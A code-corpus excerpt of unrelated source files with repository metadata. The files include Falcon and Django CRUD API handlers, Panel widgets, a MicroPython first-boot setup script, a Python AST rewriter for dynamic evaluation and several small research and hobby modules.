description='API.COMBINED_EQUIPMENT_VIRTUAL_METER_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_virtual_meters "
" (combined_equipment_id, virtual_meter_id, is_output ) "
" VALUES (%s, %s, %s) ")
cursor.execute(add_row, (id_, virtual_meter_id, is_output))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/virtualmeters/' + str(virtual_meter_id)
class CombinedEquipmentVirtualMeterItem:
@staticmethod
def __init__():
""""Initializes CombinedEquipmentVirtualMeterItem"""
pass
@staticmethod
def on_options(req, resp, id_, mid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, mid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not mid.isdigit() or int(mid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_VIRTUAL_METER_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_virtual_meters "
" WHERE id = %s ", (mid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.VIRTUAL_METER_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s AND virtual_meter_id = %s ", (id_, mid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_VIRTUAL_METER_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s AND virtual_meter_id = %s ", (id_, mid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
| 2.296875 | 2 |
app/filesystem/save.py | Hacker-1202/Selfium | 14 | 12759584 | <reponame>Hacker-1202/Selfium
import json
def save(cfg):
with open("data/config.json", "w") as writeFile:
writeFile.write(json.dumps(cfg))
writeFile.close() | 1.976563 | 2 |
geniza/footnotes/apps.py | kmcelwee/geniza | 0 | 12759585 | <gh_stars>0
from django.apps import AppConfig
class FootnotesConfig(AppConfig):
name = "geniza.footnotes"
verbose_name = "Scholarship Records"
| 1.0625 | 1 |
Back-End/src/Projects/views.py | steve-njuguna-k/Django-Angular-Projects-Manager | 1 | 12759586 | from .serializers import CategorySerializer, TaskSerializer, MemberSerializer, ProjectSerializer
from .models import Categories, Tasks, Members, Projects
from rest_framework import status
from rest_framework.parsers import JSONParser
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
@csrf_exempt
def ProjectAPI(request, id=0):
if request.method == 'GET':
project = Projects.objects.all()
serializer = ProjectSerializer(project, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
project_data = JSONParser().parse(request)
serializer = ProjectSerializer(data=project_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Project Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Project', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
project_data = JSONParser().parse(request)
project = Projects.objects.get(ProjectID = project_data['ProjectID'])
serializer = ProjectSerializer(instance=project, data=project_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Project Updated Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Update Project', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
project = Projects.objects.get(ProjectID=id)
project.delete()
return JsonResponse('Project Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
@csrf_exempt
def TaskAPI(request, id=0):
if request.method == 'GET':
task = Tasks.objects.all()
serializer = TaskSerializer(task, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
task_data = JSONParser().parse(request)
serializer = TaskSerializer(data=task_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Task Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Task', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
task_data = JSONParser().parse(request)
task = Tasks.objects.get(TaskID = task_data['TaskID'])
serializer = TaskSerializer(instance=task, data=task_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Task Updated Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Update Task', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
task = Tasks.objects.get(TaskID=id)
task.delete()
return JsonResponse('Task Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
@csrf_exempt
def CategoryAPI(request, id=0):
if request.method == 'GET':
category = Categories.objects.all()
serializer = CategorySerializer(category, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
category_data = JSONParser().parse(request)
serializer = CategorySerializer(data=category_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Category Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Category', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
category_data = JSONParser().parse(request)
category = Categories.objects.get(CategoryID = category_data['CategoryID'])
serializer = CategorySerializer(instance=category, data=category_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Category Updated Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Update Category', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
category = Categories.objects.get(CategoryID=id)
category.delete()
return JsonResponse('Category Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
@csrf_exempt
def MemberAPI(request, id=0):
if request.method == 'GET':
member = Members.objects.all()
serializer = MemberSerializer(member, many=True)
return JsonResponse(serializer.data, safe=False, status=status.HTTP_200_OK)
elif request.method == 'POST':
member_data = JSONParser().parse(request)
serializer = MemberSerializer(data=member_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Member Added Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Add Member', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'PUT':
member_data = JSONParser().parse(request)
member = Members.objects.get(MemberID = member_data['MemberID'])
serializer = MemberSerializer(instance=member, data=member_data)
if serializer.is_valid():
serializer.save()
return JsonResponse('Member Updated Successfully!', safe=False, status=status.HTTP_201_CREATED)
return JsonResponse('Failed To Update Member', safe=False, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
member = Members.objects.get(MemberID=id)
member.delete()
return JsonResponse('Member Successfully Deleted!', safe=False, status=status.HTTP_200_OK)
| 2.125 | 2 |
pengrixio/k8s/__init__.py | iorchard/pengrixio | 0 | 12759587 | import kubernetes.config
import logging
import logging.config
from pengrixio.config import KUBECONFIG
logging.config.fileConfig('logging.conf')
log = logging.getLogger('pengrixio')
# load kubernetes config file.
try:
kubernetes.config.load_kube_config(KUBECONFIG)
except:
log.warn('kubernetes cluster config file is invalid.')
| 2.015625 | 2 |
lumen/panel.py | holoviz/monitor | 1 | 12759588 | import param
from panel import panel
from panel.reactive import ReactiveHTML
from panel.widgets import FileDownload
try:
# Backward compatibility for panel 0.12.6
import bokeh.core.properties as bp
from panel.links import PARAM_MAPPING
# The Bokeh Color property has `_default_help` set which causes
# an error to be raise when Nullable is called on it. This converter
# overrides the Bokeh _help to set it to None and avoid the error.
# See https://github.com/holoviz/panel/issues/3058
def color_param_to_ppt(p, kwargs):
ppt = bp.Color(**kwargs)
ppt._help = None
return ppt
PARAM_MAPPING[param.Color] = color_param_to_ppt
except Exception:
pass
class DownloadButton(ReactiveHTML):
callback = param.Callable(precedence=-1)
color = param.Color(default='grey', allow_None=True)
data = param.String()
filename = param.String()
hide = param.Boolean(default=False)
size = param.Integer(default=20)
_template = """
<style>
.download-button {
position: absolute;
top: 0px;
right: 0px;
width: {{ size }}px;
height: {{ size }}px;
z-index: 10000;
opacity: {% if hide %}0{% else %}1{% endif %};
transition-delay: 0.5s;
transition: 0.5s;
cursor: pointer;
font-size: {{ size }}px;
{% if color %}color: {{ color }};{% endif %}
}
.download-button:hover {
transition: 0.5s;
opacity: 1;
}
.download-button:focus {
opacity: 1;
}
</style>
<span id="download-button" onclick="${_on_click}" class="download-button">
<i class="fas fa-download"></i>
</span>
"""
_scripts = {
'data': """
if (data.data == null || !data.data.length)
return
const byteString = atob(data.data.split(',')[1]);
// separate out the mime component
const mimeString = data.data.split(',')[0].split(':')[1].split(';')[0];
// Reset data
data.data = '';
// write the bytes of the string to an ArrayBuffer
const ab = new ArrayBuffer(byteString.length);
const ia = new Uint8Array(ab);
for (let i = 0; i < byteString.length; i++) {
ia[i] = byteString.charCodeAt(i);
}
// write the ArrayBuffer to a blob, and you're done
var bb = new Blob([ab], { type: mimeString });
var link = document.createElement('a');
link.href = URL.createObjectURL(bb)
link.download = data.filename
link.click()
"""
}
def __init__(self, object=None, **params):
params['sizing_mode'] = 'stretch_width'
if object is not None:
object = panel(object)
params['object'] = object
super().__init__(**params)
def _on_click(self, event=None):
file_input = FileDownload(callback=self.callback, filename=self.filename)
file_input._transfer()
self.data = file_input.data
class IconButton(ReactiveHTML):
disabled = param.Boolean(default=False)
color = param.Color(default=None)
icon = param.String(default=None, doc="""
The FontAwesome icon to use.""")
size = param.Integer(default=12, bounds=(0, None))
_template = """
<i id="icon-button" class="fas ${icon}" style="font-size: ${size}px; color: ${color}" onclick=${script('clicked')}></i>
"""
_scripts = {
'clicked': """
if (data.disabled)
return
data.disabled = true;
view._send_event('button', 'click', {target: {value: null}, type: 'icon_click'})
""",
'disabled': """
icon_button.style.cursor = data.disabled ? "not-allowed": "inherit";
"""
}
_event = 'dom_event'
def __init__(self, **params):
super().__init__(**params)
self._callbacks = []
@param.depends('size', watch=True, on_init=True)
def _update_height(self):
self.height = self.size
def on_click(self, callback):
self._callbacks.append(callback)
def js_on_click(self, args={}, code=""):
from panel.links import Callback
return Callback(self, code={'event:'+self._event: code}, args=args)
def _button_click(self, event=None):
try:
for cb in self._callbacks:
cb(event)
finally:
self.disabled = False
| 2.0625 | 2 |
models/load_model.py | HuguesMoreau/Sensors_similariy | 0 | 12759589 | """
This file contains the necessary to reconstruct the intermediary featuress from
a save of the models an inputs
Author Hugues
"""
import torch
from pathlib import Path
if __name__ == '__main__':
import sys
sys.path.append("..")
from param import data_path
file_location = Path(data_path) / Path('models')
from models.store_model_SHL import create_filename, Diagnostic_CNN
from models.store_model_CIFAR import Diagnostic_ResNet
# Diagnostic_ResNet and Diagnostic_CNN will be used for class loading
datasets = ["CIFAR_10", "SHL_2018"]
sensors = {"CIFAR_10":["CIFAR_10"],
"SHL_2018":["Gyr_y", "Acc_norm", "Mag_norm"]}
n_trials = 3 *2
#%%
def load_data(file_location, dataset, sanity_check=False):
"""
Loads the data and performs some verificaions on the ordering and performance
Parameters
----------
file_location (Path object or str): the absolute or reltive path to the
.pickle objects
dataset (str): either 'SHL_2018' or 'CIFAR_10'
sanity_check (bool): if True, also loads the raw data an makes sure that we can
recreate the predictions.
Defaults to False
Returns
-------
data: dict
keys = sensor (ex "Acc_norm" or "CIFAR_10")
values = dict
keys = split ('train' or 'val')
values = list of numpy arrays (n_samples, ...)
one array per initialization (3*2 = 6 by default)
models: dict
keys = sensor (ex "Acc_norm" or "CIFAR_10")
values = list of PyTorch nn.Module objects
ground_truth: dict
keys = split ('train' or 'val')
values = np array of ints, containing the class between 0 and n-1
"""
sensors_list = sensors[dataset]
data = {sensor:
{split:
[]
for split in ["train", "val"]}
for sensor in sensors_list}
models = {sensor:
[]
for sensor in sensors_list}
ground_truth = {split:
[]
for split in ["train", "val"]}
if sanity_check: previous_GT = {"train":None, "val":None} # we will check that
# the dataloader does not shuffle the position of the samples
# basic sensors
for sensor in sensors_list:
if sanity_check:
train_dataloader, val_dataloader = torch.load(Path(data_path) / Path("models") / Path("dataloaders-"+dataset+"-"+sensor+'.pt'))
dataloaders = {'train':train_dataloader,
'val': val_dataloader}
for trial_index in range(n_trials):
filename = create_filename(dataset, sensor, trial_index)
features_filepath = Path(data_path) / Path("models") / Path('features-' + filename)
model_filepath = Path(data_path) / Path("models") / Path('model-' + filename)
print(f"loading '{features_filepath}'...", end='')
features_pred_GT_train, features_pred_GT_val = torch.load(features_filepath)
model = torch.load(model_filepath)
features_pred_GT = {"train":features_pred_GT_train,
"val" :features_pred_GT_val
}
print(' ... done')
for i_split, split in enumerate(["train", "val"]):
features, prediction, this_gt = features_pred_GT[split]
ground_truth[split] = this_gt # the value is replaced every time, which is not
# a problem because all GT should be equal
if sanity_check:
score_name, score_value = model.validate(dataloaders[split])
print(f" {dataset:5s} {score_name} {100*score_value:.2f} %")
if previous_GT[split] is None:
previous_GT[split] = this_gt
else :
assert (previous_GT[split] == this_gt).all(), "the order of the samples changed between runs"
data[sensor][split].append(features)
model.cpu() # we dont need the model to be on GPU anymore
models[sensor].append(model)
return data, models, ground_truth
#%%
if __name__ == "__main__":
load_data(file_location, dataset="SHL_2018", sanity_check=True)
| 2.546875 | 3 |
ports/esp32/boards/AIDONBOARD32/modules/inisetup.py | henriknelson/micropython | 1 | 12759590 | import uos
from flashbdev import bdev
def check_bootsec():
buf = bytearray(bdev.ioctl(5, 0)) # 5 is SEC_SIZE
bdev.readblocks(0, buf)
empty = True
for b in buf:
if b != 0xFF:
empty = False
break
if empty:
return True
fs_corrupted()
def fs_corrupted():
import time
while 1:
print(
"""\
The filesystem appears to be corrupted. If you had important data there, you
may want to make a flash snapshot to try to recover it. Otherwise, perform
factory reprogramming of MicroPython firmware (completely erase flash, followed
by firmware programming).
"""
)
time.sleep(3)
def setup():
check_bootsec()
print("Performing initial setup")
uos.VfsLfs2.mkfs(bdev)
vfs = uos.VfsLfs2(bdev)
uos.mount(vfs, "/")
with open("webrepl_cfg.py", "w") as webrepl_cfg_file:
webrepl_cfg_file.write(
"""\
PASS = '<PASSWORD>'
"""
)
with open("boot.py", "w") as boot_file:
boot_file.write(
"""\
# This file is executed on every boot (including wake-boot from deepsleep)
import esp
import machine
import time
import sys
import traceback
print("Welcome to AidonMeterLogger console!")
print("------------------------------------")
"""
)
with open("main.py", "w") as main_file:
main_file.write(
"""\
from neo import Neo
from meter_reader import MeterReader
neo=Neo(13)
neo.blue()
handler=MeterReader(16)
handler.run()
"""
)
return vfs
| 2.328125 | 2 |
nr/ast/dynamic_eval.py | alex-700/nr-deprecated | 0 | 12759591 | # The MIT License (MIT)
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module provides an AST rewriter that takes and Read/Write operations on
global variables and rewrites them to retrieve the variable by a function
instead. Non-global variables are left untouched.
Example:
import os
from os import path
parent_dir = path.dirname(__file__)
def main():
filename = path.join(parent_dir, 'foo.py')
print(filename)
Will be converted to:
import os; __dict__['os'] = os
from os import path; __dict__['path'] = path
__dict__['parent_dir'] = __dict__['path'].dirname(__dict__['__file__'])
def main():
filename = __dict__['path'].join(__dict__['parent_dir'], 'foo.py')
__dict__['print'](filename)
"""
import ast
import collections
import textwrap
import sys
from ..compat import builtins, exec_, string_types
def get_argname(arg):
if isinstance(arg, ast.Name):
return arg.id
elif isinstance(arg, str):
return arg
elif isinstance(arg, ast.arg):
# Python 3 where annotations are supported
return arg.arg
else:
raise RuntimeError(ast.dump(arg))
class NameRewriter(ast.NodeTransformer):
# This code snippet is inserted when using the `from X import *` syntax.
IMPORT_FROM_ALL_ASSIGN = textwrap.dedent('''
# We can not use __import__(module, fromlist=[None]) as some modules seem
# to break with it (see for example nose-devs/nose#1075).
import importlib as __importlib
__module = __importlib.import_module({module!r})
try:
__vars = __module.__all__
except AttributeError:
__vars = [x for x in dir(__module) if not x.startswith('_')]
for __key in __vars:
{data_var}[__key] = getattr(__module, __key)
del __importlib, __module, __vars, __key
''')
def __init__(self, data_var):
self.data_var = data_var
self.stack = []
def __push_stack(self):
self.stack.append({'external': set(), 'vars': set()})
def __pop_stack(self):
self.stack.pop()
def __is_local(self, name):
if not self.stack:
return False
for frame in reversed(self.stack):
if name in frame['external']:
return False
if name in frame['vars']:
return True
return False
def __add_variable(self, name):
assert isinstance(name, string_types), name
if self.stack and name not in self.stack[-1]['external']:
self.stack[-1]['vars'].add(name)
def __add_external(self, name):
if self.stack:
self.stack[-1]['external'].add(name)
def __get_subscript(self, name, ctx=None):
"""
Returns `<data_var>["<name>"]`
"""
assert isinstance(name, string_types), name
return ast.Subscript(
value=ast.Name(id=self.data_var, ctx=ast.Load()),
slice=ast.Index(value=ast.Str(s=name)),
ctx=ctx)
def __get_subscript_assign(self, name):
"""
Returns `<data_var>["<name>"] = <name>`.
"""
return ast.Assign(
targets=[self.__get_subscript(name, ast.Store())],
value=ast.Name(id=name, ctx=ast.Load()))
def __get_subscript_delete(self, name):
"""
Returns `del <data_var>["<name>"]`.
"""
return ast.Delete(targets=[self.__get_subscript(name, ast.Del())])
def __visit_target(self, node):
"""
Call this method to visit assignment targets and to add local variables
to the current stack frame. Used in #visit_Assign() and
#__visit_comprehension().
"""
if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
self.__add_variable(node.id)
elif isinstance(node, (ast.Tuple, ast.List)):
[self.__visit_target(x) for x in node.elts]
def __visit_suite(self, node):
result = node
if isinstance(node, (ast.FunctionDef, ast.ClassDef)):
self.__add_variable(node.name)
if not self.__is_local(node.name):
assign = self.__get_subscript_assign(node.name)
result = [node, ast.copy_location(assign, node)]
self.__push_stack()
if sys.version_info[0] > 2 and isinstance(node, ast.ClassDef):
# TODO: This is a bit of a dirty hack to make sure that super and
# __class__ are considered as local variables in functions.
self.__add_variable('super')
self.__add_variable('__class__')
if isinstance(node, (ast.FunctionDef, ast.Lambda)): # Also used for ClassDef
for arg in node.args.args + getattr(node.args, 'kwonlyargs', []): # Python 2
self.__add_variable(get_argname(arg))
if node.args.vararg:
self.__add_variable(get_argname(node.args.vararg))
if node.args.kwarg:
self.__add_variable(get_argname(node.args.kwarg.arg))
self.generic_visit(node)
self.__pop_stack()
return result
def __visit_comprehension(self, node):
# In Python 3, comprehensions have their own scope.
has_own_scope = (sys.version_info[0] > 2)
if has_own_scope:
self.__push_stack()
for comp in node.generators:
self.__visit_target(comp.target)
self.generic_visit(node)
if has_own_scope:
self.__pop_stack()
return node
def visit_Name(self, node):
if not self.__is_local(node.id):
node = ast.copy_location(self.__get_subscript(node.id, node.ctx), node)
return node
def visit_Assign(self, node):
for target in node.targets:
self.__visit_target(target)
self.generic_visit(node)
return node
def visit_Import(self, node):
assignments = []
for alias in node.names:
name = (alias.asname or alias.name).split('.')[0]
assignments.append(self.__get_subscript_assign(name))
return [node] + [ast.copy_location(x, node) for x in assignments]
def visit_ImportFrom(self, node):
assignments = []
for alias in node.names:
name = alias.asname or alias.name
if name == '*':
code = self.IMPORT_FROM_ALL_ASSIGN.format(module=node.module, data_var=self.data_var)
module = ast.parse(code)
assignments += module.body
else:
assignments.append(self.__get_subscript_assign(name))
return [node] + [ast.copy_location(x, node) for x in assignments]
def visit_ExceptHandler(self, node):
if node.name:
self.__add_variable(get_argname(node.name)) # Python 2 has an ast.Name here, Python 3 just a string
self.generic_visit(node)
if not self.stack and node.name and sys.version_info[0] > 2:
# In Python 2, the node.name will already be replaced with a subscript
# by #visit_Name().
node.body.insert(0, ast.copy_location(self.__get_subscript_assign(node.name), node))
if sys.version_info[0] == 3:
node.body.append(ast.copy_location(self.__get_subscript_delete(node.name), node))
return node
def visit_With(self, node):
if hasattr(node, 'items'):
optional_vars = [x.optional_vars for x in node.items]
else:
# Python 2
optional_vars = [node.optional_vars]
[self.__visit_target(x) for x in optional_vars if x]
self.generic_visit(node)
return node
def visit_For(self, node):
self.__visit_target(node.target)
self.generic_visit(node)
return node
visit_FunctionDef = __visit_suite
visit_Lambda = __visit_suite
visit_ClassDef = __visit_suite
visit_ListComp = __visit_comprehension
visit_SetComp = __visit_comprehension
visit_GeneratorExp = __visit_comprehension
visit_DictComp = __visit_comprehension
def visit_Global(self, node):
for name in node.names:
self.__add_external(name)
def transform(ast_node, data_var='__dict__'):
ast_node = NameRewriter('__dict__').visit(ast_node)
ast_node = ast.fix_missing_locations(ast_node)
return ast_node
def dynamic_exec(code, resolve, assign=None, delete=None, automatic_builtins=True,
filename=None, module_name=None, _type='exec'):
"""
Transforms the Python source code *code* and evaluates it so that the
*resolve* and *assign* functions are called respectively for when a global
variable is access or assigned.
If *resolve* is a mapping, *assign* must be omitted. #KeyError#s raised by
the mapping are automatically converted to #NameError#s.
Otherwise, *resolve* and *assign* must be callables that have the same
interface as `__getitem__()`, and `__setitem__()`. If *assign* is omitted
in that case, assignments will be redirected to a separate dictionary and
keys in that dictionary will be checked before continuing with the *resolve*
callback.
"""
parse_filename = filename or '<string>'
ast_node = transform(ast.parse(code, parse_filename, mode=_type))
code = compile(ast_node, parse_filename, _type)
if hasattr(resolve, '__getitem__'):
if assign is not None:
raise TypeError('"assign" parameter specified where "resolve" is a mapping')
if delete is not None:
raise TypeError('"delete" parameter specified where "resolve" is a mapping')
input_mapping = resolve
def resolve(x):
try:
return input_mapping[x]
except KeyError:
raise NameError(x)
assign = input_mapping.__setitem__
delete = input_mapping.__delitem__
else:
input_mapping = False
class DynamicMapping(object):
_data = {}
_deleted = set()
def __repr__(self):
if input_mapping:
return 'DynamicMapping({!r})'.format(input_mapping)
else:
return 'DynamicMapping(resolve={!r}, assign={!r})'.format(resolve, assign)
def __getitem__(self, key):
if key in self._deleted:
raise NameError(key)
if assign is None:
try:
return self._data[key]
except KeyError:
pass # Continue with resolve()
try:
return resolve(key)
except NameError as exc:
if automatic_builtins and not key.startswith('_'):
try:
return getattr(builtins, key)
except AttributeError:
pass
raise exc
def __setitem__(self, key, value):
self._deleted.discard(key)
if assign is None:
self._data[key] = value
else:
assign(key, value)
def __delitem__(self, key):
if delete is None:
self._deleted.add(key)
else:
delete(key)
def get(self, key, default=None):
try:
return self[key]
except NameError:
return default
mapping = DynamicMapping()
globals_ = {'__dict__': mapping}
if filename:
mapping['__file__'] = filename
globals_['__file__'] = filename
if module_name:
mapping['__name__'] = module_name
globals_['__name__'] = module_name
return (exec_ if _type == 'exec' else eval)(code, globals_)
def dynamic_eval(*args, **kwargs):
return dynamic_exec(*args, _type='eval', **kwargs)
| 2.390625 | 2 |
olm/instances.py | DFKI-NLP/OLM | 8 | 12759592 | <reponame>DFKI-NLP/OLM
from typing import Dict, Tuple, List, Optional
class TokenField:
def __init__(self, tokens: List[str]) -> None:
self._tokens = tokens
@property
def tokens(self) -> List[str]:
return self._tokens
def __repr__(self) -> str:
return f"TokenField({self.tokens})"
class OccludedTokenField(TokenField):
def __init__(self,
tokens: List[str],
occluded_index: int,
occlude_token: str) -> None:
super().__init__(tokens)
self._occluded_index = occluded_index
self._occlude_token = occlude_token
@property
def tokens(self) -> List[str]:
tmp_tokens = list(self._tokens)
tmp_tokens[self._occluded_index] = self._occlude_token
return tmp_tokens
@property
def occluded_index(self) -> int:
return self._occluded_index
def __repr__(self) -> str:
return f"OccludedTokenField({self.tokens})"
@classmethod
def from_token_field(cls,
token_field: TokenField,
occluded_index: int,
occlude_token: str) -> "OccludedTokenField":
return cls(token_field.tokens, occluded_index, occlude_token)
class DeletedTokenField(OccludedTokenField):
def __init__(self,
tokens: List[str],
occluded_index: int) -> None:
super().__init__(tokens, occluded_index, occlude_token="")
self._occluded_index = occluded_index
@property
def tokens(self) -> List[str]:
tmp_tokens = list(self._tokens)
del tmp_tokens[self._occluded_index]
return tmp_tokens
def __repr__(self) -> str:
return f"DeletedTokenField({self.tokens})"
@classmethod
def from_token_field(cls,
token_field: TokenField,
occluded_index: int) -> "DeletedTokenField":
return cls(token_field.tokens, occluded_index)
class InputInstance:
def __init__(self,
id_: str,
**token_fields: Dict[str, List[str]]) -> None:
self.id = id_
self.token_fields = {name: TokenField(tokens)
for name, tokens in token_fields.items()}
for key, value in self.token_fields.items():
setattr(self, key, value)
def __repr__(self) -> str:
return f"InputInstance(id={self.id}, token_fields={self.token_fields})"
class OccludedInstance:
def __init__(self,
id_: str,
token_fields: Dict[str, TokenField],
weight: float = 1.) -> None:
self.id = id_
self.weight = weight
self.token_fields = token_fields
for key, value in token_fields.items():
setattr(self, key, value)
@property
def occluded_indices(self) -> Optional[Tuple[str, int]]:
indices = []
for name, field in self.token_fields.items():
if isinstance(field, OccludedTokenField):
indices.append((name, field.occluded_index))
# for now, only allow up to one occluded token per instance
assert len(indices) <= 1
return indices[0] if indices else None
def __repr__(self) -> str:
return f"OccludedInstance(id={self.id}, token_fields={self.token_fields}), weight={self.weight})"
@classmethod
def from_input_instance(cls,
input_instance: InputInstance,
occlude_token: Optional[str] = None,
occlude_field_index: Optional[Tuple[str, int]] = None,
weight: float = 1.) -> "OccludedInstance":
if occlude_token is not None and occlude_field_index is None:
raise ValueError("'occlude_token' requires setting 'occlude_field_index'.")
token_fields = input_instance.token_fields
if occlude_field_index is not None:
token_fields = dict(token_fields)
field_name, field_index = occlude_field_index
token_field = token_fields[field_name]
if occlude_token is None:
occluded_token_field = DeletedTokenField.from_token_field(token_field,
occluded_index=field_index)
else:
occluded_token_field = OccludedTokenField.from_token_field(token_field,
occluded_index=field_index,
occlude_token=occlude_token)
token_fields[field_name] = occluded_token_field
return cls(id_=input_instance.id,
token_fields=token_fields,
weight=weight)
| 2.40625 | 2 |
tomes_darcmail/lib/eaxs_helpers/Render.py | StateArchivesOfNorthCarolina/docker_dmc | 0 | 12759593 | <reponame>StateArchivesOfNorthCarolina/docker_dmc<filename>tomes_darcmail/lib/eaxs_helpers/Render.py
#############################################################
# 2016-09-22: Render.py
# Author: <NAME> (State Archives of North Carolina)
#
# Description: Renders a single Element and its children
##############################################################
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
from xml.etree.ElementTree import tostring
from xml.dom import minidom
import xml.parsers.expat
class Render:
""""""
def __init__(self, root, children=None):
"""Constructor for Render
@type root: str
@type children: dict
"""
self.root = Element(root) # type: Element
self.children = children
self._build_element()
def _build_element(self):
if self.children:
for e_type, value in self.children.items():
child = SubElement(self.root, e_type)
child.text = value
def render(self):
rough = tostring(self.root, 'utf-8')
try:
reparsed = minidom.parseString(rough)
text = reparsed.toprettyxml(indent=" ")
return text
except xml.parsers.expat.ExpatError as e:
# This is a potential problem where the binary is not actually base64 encoded
# TODO: Write corrupted bytes to a file.
self.children['Content'] = "ERROR: original attachment is corrupted"
self.root = Element('ExternalBodyPart')
self._build_element()
return self.render()
def add_child(self, name, value):
child = SubElement(self.root, name)
child.text = value
| 2.078125 | 2 |
smart-lamp/modes/terminal.py | semspanhaak/making-things-smart | 1 | 12759594 | #!/use/bin/python
import sys
from sense_hat import SenseHat
import variables.colors as c
import variables.mode as m
from libs.set_color import *
def set_color_terminal():
sense = SenseHat()
try:
color = input("Type an rgb color: ")
except (KeyboardInterrupt, SystemExit):
sys.exit()
except:
print("Changed mode...")
try:
if color == "close" or color == "next":
m.mode_index += 1
else:
c.color = color
set_color()
except (KeyboardInterrupt, SystemExit):
sys.exit()
except:
print("Not a valid input, use it as following: <number>,<number>,<number> -> 255,255,255")
| 3.03125 | 3 |
abintb/qn.py | abyellow/abin-tight-binding | 1 | 12759595 | <reponame>abyellow/abin-tight-binding<gh_stars>1-10
import numpy as np
from scipy.linalg import expm
import matplotlib.pyplot as plt
from time import time
class QnModel:
"""
Initial data/conditions of Quantum Hamiltonian and initial states.
"""
def __init__(self, QnIni, tb_model=False):
self.QnIni = QnIni
self.k = QnIni.k
self.ctrlt = QnIni.ctrlt #np.array(ctrlt) #initial control/laser
self.H0 = QnIni.H0 #Hamiltonian with no control/laser
self.Hctrl = QnIni.ham_t()#np.array(Hctrlt) #Hamiltonian of control/laser term
self.phi_i = QnIni.phi_i() #initial quantum states
self.dt = QnIni.dt #time step size
self.tb_model = tb_model
self.dim = np.shape(self.H0)[0] #dimension of Hamiltonian
self.t_ini = 0. #start time
self.tim_all = np.shape(self.Hctrl)[0] #time length of ctrl/laser
self.real_tim = np.array(range(self.tim_all+1)) * self.dt +\
self.t_ini #real time of time length
